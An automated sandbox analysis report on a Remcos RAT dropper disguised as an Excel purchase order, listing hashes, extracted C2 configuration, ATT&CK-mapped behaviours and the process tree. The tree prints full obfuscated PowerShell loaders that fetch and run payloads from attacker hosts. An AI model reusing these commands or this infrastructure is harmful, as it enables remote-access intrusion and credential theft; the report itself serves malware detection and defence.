remcos | 9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20-01-2025 10:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PurchaseOrdersheet.xls
Size

1.3MB
MD5

777464f57cb83a39b7324d1f7505b6d6
SHA1

25acb95ef77574c20002165e6b68526d7318acd1
SHA256

9eb3ac05340da70c56dc36e8beece9a7c052c945fc3ceade2c622c4defec54b3
SHA512

6609bfa04a5ae724eabd2f13c992a255554ae910ce6bcd6d25a62d8e2652d8aa129eae0908e266e3dfa808c19708a0a45c9b2922c531e03b1c2142847dbab8e3
SSDEEP

24576:pVH9M2HUO8Yfb3B/RvUp9EKDE/XY6lRvmfOdkGRjXv4cGysQYcb06hp8IJh1:LdMj/cb3I6Kg/ooofOdkGRXQcGTlczD

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2928-224-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/2676-220-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2960-219-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2676-220-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/2960-219-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	776	mshta.exe
21	776	mshta.exe
23	2192	powershell.exe
25	616	powershell.exe
26	616	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2192	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
616	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 616 set thread context of 844	616	powershell.exe	40
PID 844 set thread context of 2960	844	CasPol.exe	43
PID 844 set thread context of 2676	844	CasPol.exe	44
PID 844 set thread context of 2928	844	CasPol.exe	45

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2396	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2192	powershell.exe
2192	powershell.exe
2192	powershell.exe
616	powershell.exe
2960	CasPol.exe
2960	CasPol.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
844	CasPol.exe
844	CasPol.exe
844	CasPol.exe
844	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	616	powershell.exe
Token: SeDebugPrivilege	2928	CasPol.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE
2396	EXCEL.EXE

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 776 wrote to memory of 2452	776	mshta.exe	31
PID 776 wrote to memory of 2452	776	mshta.exe	31
PID 776 wrote to memory of 2452	776	mshta.exe	31
PID 776 wrote to memory of 2452	776	mshta.exe	31
PID 2452 wrote to memory of 2192	2452	cmd.exe	33
PID 2452 wrote to memory of 2192	2452	cmd.exe	33
PID 2452 wrote to memory of 2192	2452	cmd.exe	33
PID 2452 wrote to memory of 2192	2452	cmd.exe	33
PID 2192 wrote to memory of 2064	2192	powershell.exe	34
PID 2192 wrote to memory of 2064	2192	powershell.exe	34
PID 2192 wrote to memory of 2064	2192	powershell.exe	34
PID 2192 wrote to memory of 2064	2192	powershell.exe	34
PID 2064 wrote to memory of 960	2064	csc.exe	35
PID 2064 wrote to memory of 960	2064	csc.exe	35
PID 2064 wrote to memory of 960	2064	csc.exe	35
PID 2064 wrote to memory of 960	2064	csc.exe	35
PID 2192 wrote to memory of 2536	2192	powershell.exe	37
PID 2192 wrote to memory of 2536	2192	powershell.exe	37
PID 2192 wrote to memory of 2536	2192	powershell.exe	37
PID 2192 wrote to memory of 2536	2192	powershell.exe	37
PID 2536 wrote to memory of 616	2536	WScript.exe	38
PID 2536 wrote to memory of 616	2536	WScript.exe	38
PID 2536 wrote to memory of 616	2536	WScript.exe	38
PID 2536 wrote to memory of 616	2536	WScript.exe	38
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 616 wrote to memory of 844	616	powershell.exe	40
PID 844 wrote to memory of 2940	844	CasPol.exe	42
PID 844 wrote to memory of 2940	844	CasPol.exe	42
PID 844 wrote to memory of 2940	844	CasPol.exe	42
PID 844 wrote to memory of 2940	844	CasPol.exe	42
PID 844 wrote to memory of 2960	844	CasPol.exe	43
PID 844 wrote to memory of 2960	844	CasPol.exe	43
PID 844 wrote to memory of 2960	844	CasPol.exe	43
PID 844 wrote to memory of 2960	844	CasPol.exe	43
PID 844 wrote to memory of 2960	844	CasPol.exe	43
PID 844 wrote to memory of 2676	844	CasPol.exe	44
PID 844 wrote to memory of 2676	844	CasPol.exe	44
PID 844 wrote to memory of 2676	844	CasPol.exe	44
PID 844 wrote to memory of 2676	844	CasPol.exe	44
PID 844 wrote to memory of 2676	844	CasPol.exe	44
PID 844 wrote to memory of 2928	844	CasPol.exe	45
PID 844 wrote to memory of 2928	844	CasPol.exe	45
PID 844 wrote to memory of 2928	844	CasPol.exe	45
PID 844 wrote to memory of 2928	844	CasPol.exe	45
PID 844 wrote to memory of 2928	844	CasPol.exe	45

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PurchaseOrdersheet.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2396

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2192
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ig3_fg1s.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1AD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA1AC.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:960
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2536
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:616
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:844
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\guzmqqvxyoshspgajenljkahhltqcjpnwy"
        7⤵
        
        PID:2940
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\guzmqqvxyoshspgajenljkahhltqcjpnwy"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2960
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\jomeri"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2676
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tqsprtqta"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
e53cd17e4d14afabdd7c90237fd0ad9b

SHA1
833a6f40cccbddab67f5988feb3aac47ef12b107

SHA256
63abdcfe5fb83339d366d77a6f5f873ff0e1895e9f8dfd7e652cbcae618fde99

SHA512
bc1c7271412ad1efcf98097cb81681c7e0bd3996cd223fca53b1dda17fa7ab0ccba477c205a94526962c707bb122d3be45edd45a4dcdd6637adfcf89dbadd34c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
049553456ddd48b7242d9040fa99ad18

SHA1
817919890dfc8d1c6f20384b920bff3ffa4d9040

SHA256
ffea61f4c3df0fcd7724353e4cd0b86dbdf6971675aac4535041535ab128e9fc

SHA512
4e2d74399cdf00a472686cc9dda145f3cc80072e2dfa54b05e3b235664b3390edbfa6a17cc6c15e563c71db815920e47efc52e27c212dc3c0ea84d7756f5c2dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
33d242f7e11cc31cddb0bd08358090c5

SHA1
